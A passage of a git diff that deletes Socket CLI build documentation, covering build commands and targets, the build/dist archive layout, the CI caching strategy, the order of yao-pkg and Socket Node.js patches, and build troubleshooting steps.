-For environments where symlinks aren't viable, could build separate binaries: -```javascript -// Build each binary with environment variable -process.env.SOCKET_BINARY_MODE = 'npm' -// Then in bootstrap, check this instead of argv[0] -``` - -### Smart Installer -Create an installer that: -1. Detects the platform -2. Creates appropriate symlinks or copies -3. Adds to PATH -4. 
Handles updates - -## Troubleshooting - -### Issue: Command not routing correctly - -Check the detected binary name: -```bash -SOCKET_DEBUG=1 ./socket-npm --version -# Should show: Detected command: socket-npm -``` - -### Issue: Symlinks not working on Windows - -Windows requires admin privileges for symlinks. The build script automatically falls back to file copies on Windows. - -### Issue: Binary too large - -Since we're shipping one binary for all commands, size matters: -- Use tree-shaking in build -- Minimize bootstrap code -- Consider lazy-loading command-specific code - -## Conclusion - -This unified binary architecture allows us to maintain the expected multi-command interface while working within the constraints of single-executable packaging tools like SEA and Yao. It provides a clean, maintainable solution that works across all platforms. \ No newline at end of file diff --git a/docs/build/README.md b/docs/build/README.md deleted file mode 100644 index af69cf656..000000000 --- a/docs/build/README.md +++ /dev/null @@ -1,367 +0,0 @@ -# Socket CLI Build System - -Complete guide to building Socket CLI from source. - -## Quick Start - -```bash -# Build everything with smart caching (recommended) -pnpm build - -# Force rebuild all packages -pnpm build --force - -# Build CLI package only -pnpm build:cli - -# Watch mode for development -pnpm build:watch -# or -pnpm dev -``` - -## What Gets Built - -The Socket CLI build system builds packages in this order: - -1. **Yoga WASM** (`@socketsecurity/yoga`) - - Terminal layout engine - - Output: `packages/yoga/dist/yoga.wasm` - -2. **CLI Package** (`@socketsecurity/cli`) - - Main CLI application - - Output: `packages/cli/dist/index.js` - -3. 
**SEA Binary** (`@socketbin/node-sea-builder-builder`) - - Single Executable Application (Node.js + CLI bundled) - - Output: `packages/socketbin-node-sea-builder-builder/bin/socket` - -> **Note**: ONNX Runtime WASM (`@socketsecurity/onnxruntime`) is temporarily disabled due to build issues. AI features use pre-built assets. - -## Build Commands - -### Root Level Commands - -| Command | Description | -|---------|-------------| -| `pnpm build` | Smart build with caching (skips unchanged packages) | -| `pnpm build --force` | Force rebuild everything | -| `pnpm build --target ` | Build specific target (see targets below) | -| `pnpm build --platform

--arch ` | Build specific platform/arch (matches node-sea-builder syntax) | -| `pnpm build --targets ` | Build multiple targets | -| `pnpm build --platforms` | Build all platform binaries (8 platforms) | -| `pnpm build --platforms --parallel` | Build platforms in parallel (faster) | -| `pnpm build:cli` | Build just the CLI package | -| `pnpm build:watch` | Watch mode for development | - -### CLI Package Commands - -```bash -cd packages/cli - -# Build CLI -pnpm build - -# Force rebuild with clean -pnpm build --force - -# Watch mode -pnpm build --watch -``` - -## Build Targets - -Available targets for `pnpm build --target `: - -### Primary Targets -- `cli` - CLI package only -- `sea` - SEA binary builder -- `node` - Node.js smol builder -- `socket` - Socket package (bootstrap wrapper) -- `bootstrap` - Bootstrap package - -### Platform Binaries -- `darwin-arm64` - macOS Apple Silicon -- `darwin-x64` - macOS Intel -- `linux-arm64` - Linux ARM64 -- `linux-x64` - Linux x64 -- `alpine-arm64` - Alpine Linux ARM64 -- `alpine-x64` - Alpine Linux x64 -- `win32-arm64` - Windows ARM64 -- `win32-x64` - Windows x64 - -### Examples - -```bash -# Build just the CLI -pnpm build --target cli - -# Build for specific platform (combined syntax) -pnpm build --target darwin-arm64 - -# Build for specific platform (separate flags - matches node-sea-builder) -pnpm build --platform darwin --arch arm64 - -# Build multiple targets -pnpm build --targets cli,sea - -# Build all platform binaries sequentially -pnpm build --platforms - -# Build all platform binaries in parallel (faster) -pnpm build --platforms --parallel -``` - -## Build Features - -### Intelligent Caching - -The build system automatically skips packages that are already built and haven't changed: - -```bash -pnpm build -# First run: Builds all 4 packages (~2-5 minutes) - -pnpm build -# Second run: Skips all unchanged packages (< 1 second) -``` - -To force rebuild: - -```bash -pnpm build --force -``` - -### Watch Mode - -For active 
development, use watch mode to automatically rebuild on changes: - -```bash -pnpm build:watch -# or -pnpm dev -``` - -This watches for changes in the CLI package and automatically rebuilds. - -## Build Output - -### Directory Structure - -``` -packages/ -├── cli/ -│ ├── dist/ -│ │ ├── index.js # Main CLI bundle -│ │ ├── cli.js # CLI core (compressed) -│ │ └── cli.js.bz # Brotli compressed CLI -│ └── build/ -│ ├── cli.js # Pre-compression CLI bundle -│ ├── yoga-sync.mjs # Yoga WASM loader -│ └── onnx-sync.mjs # ONNX WASM loader -│ -├── onnxruntime/ -│ └── dist/ -│ └── ort-wasm-simd.wasm -│ -├── yoga/ -│ └── dist/ -│ └── yoga.wasm -│ -└── socketbin-node-sea-builder-builder/ - └── bin/ - └── socket # SEA binary -``` - -### Build Artifacts - -The CLI build process creates these artifacts: - -1. **TypeScript Compilation** - `.mts` → `.js` -2. **Bundling** - All code bundled into single file with esbuild -3. **WASM Extraction** - Yoga and ONNX WASM files extracted -4. **Compression** - Brotli compression for distribution -5. **Checksums** - SHA256 checksums for verification - -## Build Time Estimates - -| Build Type | Time | Disk Space | -|------------|------|------------| -| CLI only (cached) | < 1s | N/A | -| CLI only (fresh) | 30-60s | ~50 MB | -| Full build (cached) | < 1s | N/A | -| Full build (fresh) | 2-5 min | ~200 MB | -| Platform binaries (sequential) | 30-60 min | ~1 GB | -| Platform binaries (parallel) | 10-20 min | ~1 GB | - -## Setup Requirements - -### Development Dependencies - -Install dependencies: - -```bash -pnpm install -``` - -### Platform-Specific Tools - -See [Build Toolchain Setup](build-toolchain-setup.md) for platform-specific installation guides. 
- -**Quick check:** - -```bash -# Verify you have required tools -node --version # >=18 -pnpm --version # >=10.16.0 -``` - -## Build Configuration - -### Environment Variables - -Configure builds with environment variables: - -```bash -# Published build (production optimizations) -INLINED_SOCKET_CLI_PUBLISHED_BUILD=1 pnpm build - -# Legacy build (compatibility mode) -INLINED_SOCKET_CLI_LEGACY_BUILD=1 pnpm build - -# Sentry build (with error tracking) -INLINED_SOCKET_CLI_SENTRY_BUILD=1 pnpm build - -# No minification (for debugging) -SOCKET_CLI_NO_MINIFY=1 pnpm build - -# Force build (skip cache) -SOCKET_CLI_FORCE_BUILD=1 pnpm build -``` - -### Build Scripts - -The build system consists of: - -- **Root**: `scripts/build.mjs` - Orchestrates full build with caching -- **CLI**: `packages/cli/scripts/build.mjs` - Builds CLI package -- **esbuild**: `packages/cli/.config/esbuild.cli.build.mjs` - Bundle configuration - -## Troubleshooting - -### Build Fails with "Module not found" - -**Solution**: Ensure dependencies are installed: - -```bash -pnpm install -``` - -### Build is Slow - -**Solution**: Use caching and parallel builds: - -```bash -# Smart caching (only rebuilds changed packages) -pnpm build - -# Parallel platform builds -pnpm build --platforms --parallel -``` - -### "Command not found: pnpm" - -**Solution**: Install pnpm: - -```bash -npm install -g pnpm@latest -``` - -### Clean Build After git pull - -**Solution**: Force rebuild: - -```bash -pnpm build --force -``` - -### WASM Files Missing - -**Solution**: Build will automatically extract WASM files, but you can manually run: - -```bash -cd packages/cli -node scripts/extract-yoga-wasm.mjs -``` - -## Related Documentation - -- [Build/Dist Structure](build-dist-structure.md) - Output directory structure -- [Caching Strategy](caching-strategy.md) - How caching works -- [WASM Build Guide](wasm-build-guide.md) - Building WASM packages -- [Node.js Build Quick Reference](node-build-quick-reference.md) - Building 
custom Node.js -- [Node.js Patch Creation Guide](node-patch-creation-guide.md) - Creating Node.js patches - -## Advanced Topics - -### Building Custom Node.js Binaries - -For building custom Node.js binaries with Socket patches, see: -- [Node.js Build Quick Reference](node-build-quick-reference.md) -- [Node.js Patch Creation Guide](node-patch-creation-guide.md) - -### Platform-Specific Builds - -Build for specific platforms: - -```bash -# macOS Apple Silicon -pnpm build --target darwin-arm64 - -# Linux x64 -pnpm build --target linux-x64 - -# Windows x64 -pnpm build --target win32-x64 -``` - -### SEA Binary Build - -Build the Single Executable Application: - -```bash -# Via target -pnpm build --target sea - -# Via CLI package -cd packages/cli -pnpm build --sea -``` - -### CI/CD Integration - -For CI/CD pipelines: - -```bash -# Install dependencies -pnpm install --frozen-lockfile - -# Build everything -pnpm build - -# Verify build -pnpm check -pnpm test -``` - -## Help - -For more help: - -```bash -# Show build system help -pnpm build --help - -# Show available targets -pnpm build --help | grep -A20 "Available Targets" -``` diff --git a/docs/build/build-dist-structure.md b/docs/build/build-dist-structure.md deleted file mode 100644 index 48de7ce4e..000000000 --- a/docs/build/build-dist-structure.md +++ /dev/null @@ -1,180 +0,0 @@ -# Build/Dist Structure with History/Archive Pattern - -## Philosophy - -**build/** (gitignored) -- Workspace for building with intermediates -- Archive/history of completed builds with different configs -- Allows comparison, experimentation, rollback -- All ephemeral but useful for development - -**dist/** (tracked in git) -- The "blessed" canonical distribution artifact -- What actually ships and gets consumed by other packages -- Single source of truth for "current production build" - -## Recommended Structure - -``` -packages// -├── build/ # Gitignored workspace + archive -│ ├── tmp/ # Current build intermediates (cmake, obj files, etc.) 
-│ ├── cache/ # Download caches, source clones -│ └── archive/ # Historical completed builds -│ ├── 2025-10-26-001-opt-size/ -│ ├── 2025-10-26-002-opt-speed/ -│ ├── 2025-10-26-003-debug/ -│ └── latest/ # Symlink to most recent build -└── dist/ # Tracked canonical releases - └── -``` - -## Package-Specific Patterns - -### packages/yoga-layout - -``` -build/ -├── tmp/ # cmake/, _deps/, bin/, yoga-source/ -├── cache/ # Downloaded yoga source tarballs -└── archive/ - ├── 2025-10-26-opt-oz/ # Build with -Oz optimization - │ ├── yoga.wasm - │ └── yoga.js - ├── 2025-10-26-opt-o3/ # Build with -O3 optimization - │ ├── yoga.wasm - │ └── yoga.js - └── latest -> 2025-10-26-opt-oz/ - -dist/ -├── yoga.wasm # Blessed release (copied from build/archive/latest/) -└── yoga.js -``` - -### packages/minilm-builder - -``` -build/ -├── tmp/ # Python venv, conversion intermediates -├── cache/ # Hugging Face model cache -└── archive/ - ├── minilm-l6-v2-int8/ # INT8 quantized - │ ├── model.onnx - │ └── tokenizer.json - ├── minilm-l6-v2-fp16/ # FP16 quantized - │ ├── model.onnx - │ └── tokenizer.json - └── latest -> minilm-l6-v2-int8/ - -dist/ -├── model.onnx # Blessed model -└── tokenizer.json -``` - -### packages/node-sea-builder - -``` -build/ -├── tmp/ # AST transformation temp files -├── cache/ # Node binary cache -└── archive/ - ├── socket-sea-full/ # Full CLI embedded - │ ├── socket-macos-arm64 - │ ├── socket-linux-x64 - │ └── build-manifest.json - ├── socket-sea-minimal/ # Minimal CLI - │ └── socket-macos-arm64 - └── latest -> socket-sea-full/ - -dist/ -├── socket-macos-arm64 # Blessed SEA binary -├── socket-linux-x64 -└── socket-win-x64.exe -``` - -### packages/node-smol-builder - -``` -build/ -├── tmp/ # Node.js build intermediates (obj files) -├── cache/ # Node.js source cache -└── archive/ - ├── node-24.10.0-brotli-sea/ # With brotli+sea patches - │ ├── node - │ └── build-manifest.json - ├── node-24.10.0-minimal/ # Minimal patches - │ └── node - ├── node-24.10.0-compressed/ # 
Post-compression - │ └── node - └── latest -> node-24.10.0-compressed/ - -dist/ -└── node # Blessed Node.js binary -``` - -### packages/cli - -``` -# Special case - dist/ is gitignored (ephemeral Rollup output) -dist/ -└── cli.js # Rollup bundled CLI (consumed by node-sea-builder) -``` - -## Build Script Pattern - -Build scripts should support archiving with: -- Timestamp-based archive naming: `YYYY-MM-DD-NNN-description` -- Build manifest JSON: config, flags, version, size, date -- Automatic "latest" symlink update -- Optional `--archive` flag to save to archive/ -- Copy from archive/latest/ → dist/ for "blessed" promotion - -## Benefits - -1. **Experimentation**: Try different optimization levels without losing previous builds -2. **Comparison**: Easy A/B testing of build configurations -3. **Rollback**: Keep working builds when experimenting -4. **History**: Understand what changed between builds -5. **Debugging**: Compare artifacts when tracking down issues -6. **Documentation**: Build manifests document exact build configuration - -## Gitignore Strategy - -```gitignore -# .gitignore (root) -**/build/ # All build artifacts and archives (gitignored) - -# dist/ NOT globally ignored - tracked in git for blessed releases -# Exception: packages/cli/.gitignore ignores its own dist/ (ephemeral Rollup output) -``` - -## Promotion Workflow - -1. Build → `build/tmp/` (intermediates) -2. Success → `build/archive//` (completed build) -3. Update → `build/archive/latest` symlink -4. Test and validate -5. Promote → Copy `build/archive/latest/*` → `dist/` (blessed release) -6. 
Commit `dist/` changes to git - -## Example Build Manifest - -`build/archive/2025-10-26-001-opt-oz/build-manifest.json`: -```json -{ - "timestamp": "2025-10-26T14:30:00Z", - "config": { - "optimization": "-Oz", - "target": "wasm32", - "features": ["size-optimized"] - }, - "artifacts": [ - {"file": "yoga.wasm", "size": 133120, "hash": "sha256:abc123..."}, - {"file": "yoga.js", "size": 19456, "hash": "sha256:def456..."} - ], - "versions": { - "yoga": "3.1.0", - "emscripten": "3.1.50" - } -} -``` diff --git a/docs/build/caching-strategy.md b/docs/build/caching-strategy.md deleted file mode 100644 index a25210c3f..000000000 --- a/docs/build/caching-strategy.md +++ /dev/null @@ -1,241 +0,0 @@ -# Build Caching Strategy - -## Overview - -Socket CLI uses a **unified, consistent caching strategy** across all build workflows to minimize build times and preserve compilation progress between CI runs. - -## Strategy Decision Tree - -``` -Does the build compile C/C++? -├─ YES → Is it native or WASM? -│ ├─ Native Build (smol) -│ │ ├─ Use ccache for per-object-file caching -│ │ └─ Use build directory cache for CMake state -│ └─ WASM Build (Yoga, ONNX) -│ └─ Use build directory cache only -│ (Emscripten doesn't integrate well with ccache) -└─ NO (AI Models, SEA) - └─ Cache final output only -``` - -## Caching Patterns - -### Pattern 1: Native C++ Builds (smol) - -**Use case**: Compiling Node.js from source to native binaries - -**Strategy**: ccache + build directory cache - -```yaml -- name: Setup ccache (Linux/macOS) - uses: hendrikmuhs/ccache-action@... - with: - key: build-${{ platform }}-${{ arch }}-${{ hash }} - max-size: 2G - -- name: Restore build cache - uses: actions/cache@... - with: - path: | - packages/node-smol-builder/build - packages/node-smol-builder/.node-source - key: node-smol-build-${{ platform }}-${{ arch }}-${{ hash }} - restore-keys: | - node-smol-build-${{ platform }}-${{ arch }}- - -- name: Restore binary cache - uses: actions/cache@... 
- with: - path: packages/node-smol-builder/dist/socket-smol-* - key: node-smol-${{ platform }}-${{ arch }}-${{ hash }} -``` - -**Why both ccache and build directory?** -- **ccache**: Caches individual compiled object files (very granular) -- **build directory**: Caches CMake configuration, dependency tracking, build state -- **Together**: Maximum build speed and failure recovery - -**Benefits:** -- First build: ~60-90 minutes -- Cached build: ~5-10 minutes (ccache hits on all objects) -- Partial failure: Can resume from cached state - -### Pattern 2: WASM C++ Builds (Yoga, ONNX) - -**Use case**: Compiling C++ to WebAssembly with Emscripten - -**Strategy**: Build directory cache only (no ccache) - -```yaml -- name: Restore output cache - uses: actions/cache@... - with: - path: packages/yoga-layout/build/wasm - key: yoga-wasm-${{ hash }} - -- name: Restore build cache - uses: actions/cache@... - with: - path: | - packages/yoga-layout/build - packages/yoga-layout/.yoga-source - key: yoga-build-${{ hash }} - restore-keys: | - yoga-build- -``` - -**Why no ccache?** -- Emscripten uses custom LLVM-based compilation -- ccache integration is unreliable with Emscripten -- Build directory caching achieves the same goal more simply - -**Benefits:** -- Yoga: ~2-3 minutes → ~1 minute (already fast) -- ONNX: ~30-40 minutes → ~2-3 minutes (on failure recovery) -- Simpler, more reliable than ccache integration - -### Pattern 3: Non-C++ Builds (AI Models, SEA) - -**Use case**: Python model conversion, JavaScript bundling - -**Strategy**: Output cache only - -```yaml -- name: Restore output cache - uses: actions/cache@... 
- with: - path: packages/socketbin-cli-ai/dist - key: ai-models-${{ hash }} -``` - -**Why output only?** -- No compilation involved (Python scripts, JS bundling) -- Intermediate state doesn't speed up rebuilds -- Simple caching is sufficient - -**Why no directory cache?** - -**AI Models:** -- Single-pass conversion process (PyTorch → ONNX → Quantize) -- No incremental compilation (can't resume partway) -- Intermediate files are temporary and immediately deleted -- If conversion fails, must restart from beginning anyway -- Total time: ~10-15 minutes (not long enough to justify cache overhead) - -**SEA (Single Executable Application):** -- Just bundling JavaScript + injecting into pre-built Node.js binary -- Total time: ~30 seconds (already very fast) -- Uses pre-built Node.js from pkg cache (no compilation) -- JavaScript bundling regenerates instantly (~10 seconds) -- Cache download time would exceed rebuild time - -**When directory caching is valuable:** -- ✅ Compilation is slow (>5 minutes) -- ✅ Builds can fail partway through long compilation -- ✅ Intermediate state is reusable (compiled objects, CMake cache) -- ✅ Resuming from cache is faster than rebuilding - -**When directory caching is NOT valuable:** -- ❌ No compilation (just scripting, bundling, copying) -- ❌ Builds are already fast (<1 minute) -- ❌ No reusable intermediate state (temp files, single-pass operations) -- ❌ Cache overhead exceeds time saved - -## Cache Key Strategy - -All caches use **content-based hashing** for invalidation: - -```bash -HASH=$(find -type f \( -name "pattern" \) | sort | xargs sha256sum | sha256sum | cut -d' ' -f1) -``` - -**Key format:** -``` ----- -``` - -**Examples:** -- `node-smol-build-linux-x64-abc123def456` (smol build cache) -- `yoga-build-abc123def456` (Yoga build cache) -- `onnx-runtime-build-abc123def456` (ONNX build cache) - -**Restore keys** provide prefix matching for partial cache hits: -```yaml -restore-keys: | - node-smol-build-linux-x64- - 
node-smol-build-linux- -``` - -## Cache Layers - -### Layer 1: Build Dependencies -- **Cached**: Python, Ninja, Emscripten SDK -- **Purpose**: Avoid re-downloading build tools -- **Duration**: Stable across builds - -### Layer 2: Source Code -- **Cached**: Cloned repositories (`.node-source/`, `.yoga-source/`, `.onnx-source/`) -- **Purpose**: Skip git clone operations -- **Duration**: Stable unless version changes - -### Layer 3: Intermediate Build -- **Cached**: CMake cache, compiled objects (`build/`) -- **Purpose**: Resume compilation from previous state -- **Duration**: Invalidated on source/patch changes - -### Layer 4: Compilation Cache (Native only) -- **Cached**: Per-object-file compilation results (ccache) -- **Purpose**: Instant reuse of unchanged compiled objects -- **Duration**: Survives source changes (object-level granularity) - -### Layer 5: Final Output -- **Cached**: Blessed artifacts (`dist/`) -- **Purpose**: Skip entire build if nothing changed -- **Duration**: Exact hash match required - -## Build Time Comparison - -| Build | First Run | Cached | With Intermediate Cache | -|-------|-----------|--------|------------------------| -| Smol (native) | 60-90 min | 5-10 min | 10-15 min (partial) | -| ONNX (WASM) | 30-40 min | instant | 2-3 min (on failure) | -| Yoga (WASM) | 2-3 min | instant | 1-2 min (partial) | -| AI Models | 10-15 min | instant | N/A (no compilation) | -| SEA | 5-10 min | instant | N/A (just bundling) | - -## Implementation Checklist - -When adding a new build workflow: - -- [ ] Determine if it compiles C/C++ (Pattern 1 or 2) -- [ ] If native C++: Add ccache setup -- [ ] Add build directory cache for all C++ builds -- [ ] Add output cache for final artifacts -- [ ] Use content-based hash for cache keys -- [ ] Add restore-keys for prefix matching -- [ ] Test cache hit/miss scenarios -- [ ] Document expected build times - -## Troubleshooting - -### Cache not restoring -- Check cache key hash generation includes all relevant files -- 
Verify restore-keys provide fallback options -- Check GitHub Actions cache size limits (10 GB per repo) - -### Build slower with cache -- Check ccache statistics (`ccache -s`) -- Verify build directory cache includes CMake cache -- Check for cache corruption (force rebuild with `--force`) - -### Cache too large -- Adjust ccache max-size (default: 2G) -- Clean build directories of unnecessary artifacts -- Consider excluding large intermediate files - -## Related Documentation - -- [Build/Dist Structure](build-dist-structure.md) - Archive and promotion workflow -- [Node.js Patches](../../build/patches/socket/README.md) - Patch management -- [GitHub Actions Caching](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) diff --git a/docs/build/node-build-order-explained.md b/docs/build/node-build-order-explained.md deleted file mode 100644 index 971b66db7..000000000 --- a/docs/build/node-build-order-explained.md +++ /dev/null @@ -1,287 +0,0 @@ -# Node.js Build Order Explained - -This document clarifies the order of operations in the Node.js custom binary build process and explains why yao-pkg patches are applied before Socket patches. - -## TL;DR - -**Order**: yao-pkg patches → Socket patches → Build → Binary - -This is correct because: -- yao-pkg patches modify the **build system** (V8, PKG infrastructure) -- Socket patches modify **runtime behavior** (JavaScript code) -- Both are applied to **source code** before compilation -- The resulting **binary** is what pkg uses - -## Common Confusion - -**Misconception**: "yao-pkg needs our binary before it can patch" - -**Reality**: yao-pkg provides **patches for Node.js source code**, not tools that operate on binaries. We're not patching yao-pkg's tools; we're using yao-pkg's patches to modify Node.js. - -## The Complete Flow - -### Phase 1: Source Preparation - -``` -1. 
Clone Node.js source code (v24.10.0) - └─> Downloads ~2GB from nodejs/node repository - └─> Result: .custom-node-build/node-yao-pkg/ directory -``` - -### Phase 2: yao-pkg Patches (Infrastructure) - -``` -2. Apply yao-pkg patches to Node.js SOURCE - ├─> Modifies V8 engine (deps/v8/) - │ └─> Enables bytecode compilation without source - │ └─> Allows pkg to bundle pre-compiled bytecode - │ - ├─> Modifies Node.js build system (node.gyp, tools/) - │ └─> Adds PKG bootstrap code - │ └─> Adds BAKERY placeholder system - │ └─> Configures for single-file executable support - │ - └─> Result: Node.js source is now pkg-compatible -``` - -**What these patches do**: -- **V8 Bytecode**: Allows V8 to load bytecode without original JavaScript source -- **PKG Bootstrap**: Adds special entry point for pkg-built executables -- **BAKERY Placeholder**: System for runtime argument injection - -**Files Modified** (examples): -- `deps/v8/src/codegen/compiler.cc` - V8 compilation changes -- `lib/internal/bootstrap/node.js` - Bootstrap modifications -- `src/node.cc` - Node.js core changes -- `node.gyp` - Build system changes - -### Phase 3: Socket Patches (Behavior) - -``` -3. Apply Socket patches to Node.js SOURCE - └─> Modifies lib/sea.js (JavaScript file) - ├─> Changes: const { isSea, ... } = internalBinding('sea'); - └─> To: const isSea = () => true; - const { ... } = internalBinding('sea'); -``` - -**What this patch does**: -- Makes `require('node:sea').isSea()` always return `true` -- Required because pkg executables need to behave as Single Executable Applications -- Without this, pkg binaries can't properly detect their embedded code - -**Files Modified**: -- `lib/sea.js` - Single file, simple JavaScript change - -### Phase 4: Build - -``` -4. Configure Node.js build - └─> ./configure --with-intl=small-icu --without-npm ... - -5. 
Build Node.js binary - └─> make -j10 (30-60 minutes depending on CPU) - └─> Result: .custom-node-build/node-yao-pkg/out/Release/node -``` - -**Result**: A Node.js binary that: -- ✅ Can load V8 bytecode (yao-pkg patch) -- ✅ Has PKG bootstrap system (yao-pkg patch) -- ✅ Reports as SEA (Socket patch) -- ✅ Works with pkg to create single-file executables - -### Phase 5: Post-Build - -``` -6. Strip debug symbols - └─> 82MB → 54MB - -7. Code sign (macOS ARM64) - └─> Ad-hoc signing - -8. Install to pkg cache - └─> Copy to ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64 -``` - -### Phase 6: Usage - -``` -9. User runs: pnpm exec pkg . - └─> pkg tool uses our custom Node.js binary from cache - └─> Creates single-file executable with embedded code - └─> Executable works because: - ├─> V8 can load bytecode (yao-pkg patch) - ├─> PKG bootstrap loads code (yao-pkg patch) - └─> isSea() returns true (Socket patch) -``` - -## Why This Order? - -### Why yao-pkg First? - -**yao-pkg patches modify infrastructure**: -- V8 engine internals (C++) -- Node.js build system (gyp files) -- Core Node.js runtime (C++) - -**These must be applied first** because they change how Node.js: -- Compiles (build system changes) -- Starts up (bootstrap changes) -- Executes code (V8 changes) - -### Why Socket Second? - -**Socket patches modify behavior**: -- JavaScript runtime behavior (lib/sea.js) -- Pure JavaScript changes -- No C++ or build system changes - -**These must be applied after** because: -- They depend on the infrastructure being correct -- They're simple overlays on top of yao-pkg's infrastructure -- They don't affect the build system itself - -### Why Not the Other Way? 
- -If we applied Socket patches first, then yao-pkg patches: -- ❌ yao-pkg patches might conflict with our changes -- ❌ yao-pkg patches might overwrite our changes -- ❌ Build system changes wouldn't see our modifications - -## Dependency Graph - -``` -Node.js Source Code (v24.10.0) - ↓ - [yao-pkg patches] - ├─> V8 Bytecode Support - ├─> PKG Bootstrap System - └─> Build System Changes - ↓ - [Socket patches] - └─> SEA Detection Override - ↓ - [Build Process] - └─> Compile to Binary - ↓ - Custom Node.js Binary - ↓ - [pkg tool uses it] - └─> Single-file Executable -``` - -## What If We Reversed The Order? - -### Scenario: Socket Patches → yao-pkg Patches - -``` -1. Apply Socket patch to lib/sea.js - └─> isSea = () => true - -2. Apply yao-pkg patches - └─> Might modify lib/sea.js in conflicting way - └─> Could overwrite our changes - └─> Context might not match anymore -``` - -**Result**: Patch conflicts or lost changes - -### Scenario: Both at Once - -``` -1. Merge patches into one file -``` - -**Problems**: -- Hard to maintain separate concerns -- Can't update yao-pkg independently -- Harder to debug which patch caused issues -- Loses modularity - -## Real-World Analogy - -Think of building a custom car: - -1. **yao-pkg patches** = Modifying the **engine and chassis** - - Change how the engine works internally - - Modify the frame structure - - Add special fuel injection system - -2. **Socket patches** = Installing **custom dashboard software** - - Changes what the speedometer displays - - Modifies instrument cluster behavior - - Pure software change, no engine mods - -**Order**: -1. First: Modify engine (yao-pkg) - Must be done before software -2. Then: Install dashboard software (Socket) - Depends on engine being ready -3. 
Finally: Drive the car (Build) - Compiles everything together - -## Verification - -You can verify this order is correct by checking what each patch modifies: - -### Check yao-pkg Patch - -```bash -head -100 .custom-node-build/patches/node.v24.10.0.cpp.patch - -# You'll see: -# - deps/v8/... (V8 engine files) -# - src/node.cc (Core Node.js C++) -# - node.gyp (Build system) -# - lib/internal/bootstrap/... (Bootstrap code) -``` - -### Check Socket Patch - -```bash -cat build/patches/socket/enable-sea-for-pkg-binaries-v24.patch - -# You'll see: -# - lib/sea.js (Single JavaScript file) -# - Simple behavior change -``` - -**No overlap** = Safe to apply in sequence - -## What About "yao needs our bin"? - -This might refer to a different part of the process: - -**What might be confused**: -- We need yao-pkg's **patches** (not binary) to build our Node.js -- pkg tool (the binary) uses our **Node.js binary** to create executables -- But pkg tool is already built - we don't build it - -**Correct understanding**: -- yao-pkg project provides: Patches for Node.js -- We apply those patches to: Node.js source -- We build: Custom Node.js binary -- pkg tool uses: Our custom Node.js binary -- Result: Single-file executables - -## Summary - -**The order is correct**: -1. ✅ yao-pkg patches (infrastructure: V8, build system, bootstrap) -2. ✅ Socket patches (behavior: SEA detection) -3. ✅ Build (compile everything) -4. 
✅ Result: Binary that works with pkg - -**Why it works**: -- Infrastructure first (yao-pkg) -- Behavior second (Socket) -- No conflicts or overwrites -- Clean separation of concerns - -**Common confusion cleared**: -- We're patching Node.js **source**, not binaries -- yao-pkg provides **patches**, not a tool that needs our binary -- The resulting **binary** is what pkg uses -- Order is: patch → patch → build → binary, not: binary → patch - ---- - -**Last Updated**: 2025-10-15 -**Applies To**: Socket CLI v1.0.80+ diff --git a/docs/build/node-build-quick-reference.md b/docs/build/node-build-quick-reference.md deleted file mode 100644 index 8fdb0ac96..000000000 --- a/docs/build/node-build-quick-reference.md +++ /dev/null @@ -1,449 +0,0 @@ -# Node.js Build Quick Reference - -Quick reference guide for building custom Node.js binaries with yao-pkg and Socket patches. - -## 🚀 Common Commands - -### Build Commands - -```bash -# Normal build (incremental if possible) -node scripts/build-yao-pkg-node.mjs - -# Clean build (start from scratch) -node scripts/build-yao-pkg-node.mjs --clean - -# Build and verify -node scripts/build-yao-pkg-node.mjs --verify - -# Clean build with verification -node scripts/build-yao-pkg-node.mjs --clean --verify -``` - -### Verification Commands - -```bash -# Verify the build -node scripts/verify-node-build.mjs - -# Integration test (build → pkg → execute) -node scripts/test-yao-pkg-integration.mjs -``` - -### Maintenance Commands - -```bash -# Remove build artifacts (clean slate) -rm -rf .custom-node-build/ - -# Remove just the Node.js source (keep patches) -rm -rf .custom-node-build/node-yao-pkg/ - -# Clear pkg cache -rm -rf ~/.pkg-cache/ -``` - -## 🔍 Troubleshooting - -### Build Fails: "Tool not available" - -**Error**: -``` -❌ strip is NOT available -❌ codesign is NOT available -``` - -**Fix**: -```bash -# Install Xcode Command Line Tools -xcode-select --install - -# Verify tools are available -which strip # Should return: /usr/bin/strip 
-which codesign # Should return: /usr/bin/codesign -``` - -### Build Fails: "Patch validation failed" - -**Error**: -``` -❌ INVALID: Patch supports v24.9.0-v24.9.5 but you're using v24.10.0 -``` - -**Fix**: -```bash -# Option 1: Remove incompatible patch (system will use direct modifications) -rm build/patches/socket/fix-v8-include-paths-*.patch - -# Option 2: Use correct Node.js version -# Edit scripts/build-yao-pkg-node.mjs and change NODE_VERSION -``` - -### Build Fails: "V8 include path not found" - -**Error**: -``` -fatal error: 'base/iterator.h' file not found -``` - -**Fix**: -```bash -# This happens when wrong patches are applied to v24.10.0+ -# Clean and rebuild (will use direct modifications) -node scripts/build-yao-pkg-node.mjs --clean -``` - -**Why**: v24.10.0+ has correct V8 include paths. Don't apply v24.9.0 V8 patches! - -### Build Fails: "Download failed" - -**Error**: -``` -❌ Download Failed -Failed to download yao-pkg patch after 3 attempts -``` - -**Fix**: -```bash -# Check internet connection -curl -I https://github.com - -# Manually download patch -curl -L https://raw.githubusercontent.com/yao-pkg/pkg-fetch/main/patches/node.v24.10.0.cpp.patch \ - -o .custom-node-build/patches/node.v24.10.0.cpp.patch - -# Retry build -node scripts/build-yao-pkg-node.mjs -``` - -### Build Fails: "Corrupted patch file" - -**Error**: -``` -❌ Corrupted Patch File -Downloaded patch file is corrupted: File contains HTML -``` - -**Fix**: -```bash -# System will auto-retry, but if persistent: -rm .custom-node-build/patches/node.v24.10.0.cpp.patch -node scripts/build-yao-pkg-node.mjs -``` - -### Build Fails: During compilation - -**Error**: -``` -❌ Build Failed -Node.js compilation failed. See build log for details. -``` - -**Fix**: -```bash -# Check last 50 lines of log (shown automatically) -# Full log: -less .custom-node-build/build.log - -# Common issues: -# 1. Out of memory - Close other applications -# 2. Disk full - Free up space (need 5GB) -# 3. 
